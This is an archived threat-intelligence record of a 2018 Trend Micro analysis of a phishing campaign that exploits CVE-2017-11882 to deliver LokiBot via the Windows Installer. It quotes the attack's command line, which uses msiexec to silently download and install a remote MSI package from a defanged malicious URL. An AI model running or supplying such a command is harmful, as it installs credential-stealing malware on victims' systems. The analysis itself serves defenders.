{
	"id": "7cbcb84f-ba06-4e61-a3f2-268923459f62",
	"created_at": "2026-04-06T00:19:20.416Z",
	"updated_at": "2026-04-10T03:24:24.434203Z",
	"deleted_at": null,
	"sha1_hash": "9e78cab26a45ddae49c630fce09ad4d20fb7aaca",
	"title": "Attack Using Windows Installer Leads to LokiBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 75430,
	"plain_text": "Attack Using Windows Installer Leads to LokiBot\r\nBy By: Martin Co, Gilbert Sison Feb 08, 2018 Read time: 4 min (1110 words)\r\nPublished: 2018-02-08 · Archived: 2026-04-05 12:53:34 UTC\r\nBack in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected\r\nMicrosoft Office. However, this didn’t prevent cybercrime groups such as Cobalt from exploiting this\r\nvulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki\r\ninfostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets.\r\nRecently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of\r\ninstallation—via the Windows Installer service in Microsoft Windows operating systems. This differs from\r\nprevious malware that exploited the vulnerability using the Windows executable mshta.exe to run a Powershell\r\nscript, which is used to download and execute the payload. This attack uses msiexec.exe as part of the Windows\r\nInstaller service.\r\nInfection Chain\r\nintel\r\nFigure 1. Infection Chain for the attack\r\nThe samples we analyzed seem to be part of a malware spam campaign. It starts off with an email that asks the\r\nrecipient to confirm a payment they made to the sender. The email contains text written in Korean, which is\r\nroughly translated as “hello, please check if your PC may be infected by virus or malicious codes,” apparently to\r\nwarn the recipient about possible infections.\r\nThe email also contains an attached document file labeled “Payment copy.Doc” (Detected by Trend Micro as\r\nTROJ_CVE201711882.SM) which is supposedly a payment confirmation document. However, the attachment is\r\nactually used to exploit CVE-2017-11882.\r\nintel\r\nFigure 2. Spam email containing the document file used to exploit CVE-2017-11882\r\nintel\r\nFigure 3. How the document will appear to the user\r\nThe exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled\r\nzus.msi via Windows Installer through the following command line:\r\nCall cmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi\r\n \r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\r\nPage 1 of 3\n\nintel\r\nFigure 4. msiexec download and installation. msiexec.exe gives the binary the file name MSIFD83.tmp\r\nintel\r\nFigure 5. MSIL binary after installation\r\nOnce downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the\r\nsystem. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft\r\nIntermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.\r\nOne notable aspect of the package is that it provides a compression layer that file scan engines need to process and\r\nenumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify\r\nthe actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary.\r\nThe binary launches another randomly-named instance of itself. This instance will be hollowed out and replaced\r\nwith the malware payload.\r\nintel\r\nFigure 6. Hollowed out instance of MSIL debugger view\r\nSo far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA).\r\nHowever, it is modular enough to deliver other payloads.\r\nintel\r\nFigure 7. The malware sample we identified as a LokiBot variant\r\nWhy does it use a new installation method?\r\nSecurity software has become proficient at monitoring possible downloader processes such as Wscript,\r\nPowershell, Mshta.exe, Winword.exe, and other similar executables that have become increasingly popular\r\nmethods of installing malicious payload. Due to their widespread use, it became easy to stop the arrival of threats\r\nvia these software. However, the use of msiexec.exe to download a malicious MSI package is not something we\r\ntypically see in most malware.\r\nWhile other existing malware families use msiexec.exe, such as the Andromeda botnet (Detected by Trend Micro\r\nas ANDROM family), the difference is in how this method uses the installer. In Andromeda’s case, code is\r\ninjected to msiexec.exe to download updates and download the payloads. Another key difference is that when\r\nAndromeda downloads its payloads and updates, it immediately downloads and executes a PE file. This method\r\nuses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as\r\nintended.\r\nMalware has never really needed to install itself through an MSI package. Unlike most malware that use\r\nmsiexec.exe, the malware we analyzed does so without modifying the binary or its processes, and uses the\r\navailable functionality of Windows Installer to install malware. In addition, MSI packages are typically abused for\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\r\nPage 2 of 3\n\nmalicious purposes to install Potentially Unwanted Applications (PUA) and not by malware per se. This is a new\r\ndirection for malware creators.\r\nWhy the use of this specific installation type? We believe it might represent a new evasion mechanism for\r\nmalware creators to skirt around security software that usually focuses on traditional installation methods. While\r\nwe did manage to detect samples of the malware payload in limited numbers, we cannot definitively say if these\r\nsamples are being delivered via the method described. What we can surmise, however, is that the malware creators\r\nmight be focusing on Korean targets given the language used in the sample email. They could also be testing\r\ndifferent ways of delivery — like this new attack method — to determine their effectiveness.\r\nMitigation                             \r\nGiven the use of phishingnews- cybercrime-and-digital-threats emails as the primary method of propagation, both\r\nusers and organizations can mitigate the impact of this particular attack by implementing best practicesnews-cybercrime-and-digital-threats designed to combat email-based threats.\r\nContext is very important in this instance. For example, recipients should be suspicious of any email that asks for\r\nthe confirmation of payment receipts or deliveries for non-existent transactions. Any unusual messages, sentences\r\nor phrases should also be a red flag for recipients. Again, in this case, the inclusion of a warning to check for any\r\nsuspicious software is quite out of place in a supposed payment confirmation email. Communication that involve\r\nbusiness transactions are also often highly professional, so any misspellings or grammatical errors, especially if\r\nexcessive, could signify a phishing attempt.\r\nAnother option that is more specific to this attack would be to disable or restrict Windows Installer itself to\r\nprevent potential attackers from installing software on the user’s systems, or set the system to only install\r\nprograms set up by a system administrator.\r\nTrend Micro Solutions\r\nTrend Micro™ Deep Securityproducts™and TippingPointproducts provide virtual patching that protects endpoints\r\nfrom threats that abuse unpatched vulnerabilities.\r\nTrend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range\r\nof threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning\r\nto secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads.\r\nWith capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against\r\ntoday’s purpose-built threats that bypass traditional controls, exploit known, unknown, or\r\nundisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security\r\nsolutions: Hybrid Cloud Securityproducts, User Protectionproducts, and Network Defenseproducts.\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"
	],
	"report_names": [
		"attack-using-windows-installer-msiexec-exe-leads-lokibot"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434760,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.pdf",
		"text": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.txt",
		"img": "https://archive.orkl.eu/9e78cab26a45ddae49c630fce09ad4d20fb7aaca.jpg"
	}
}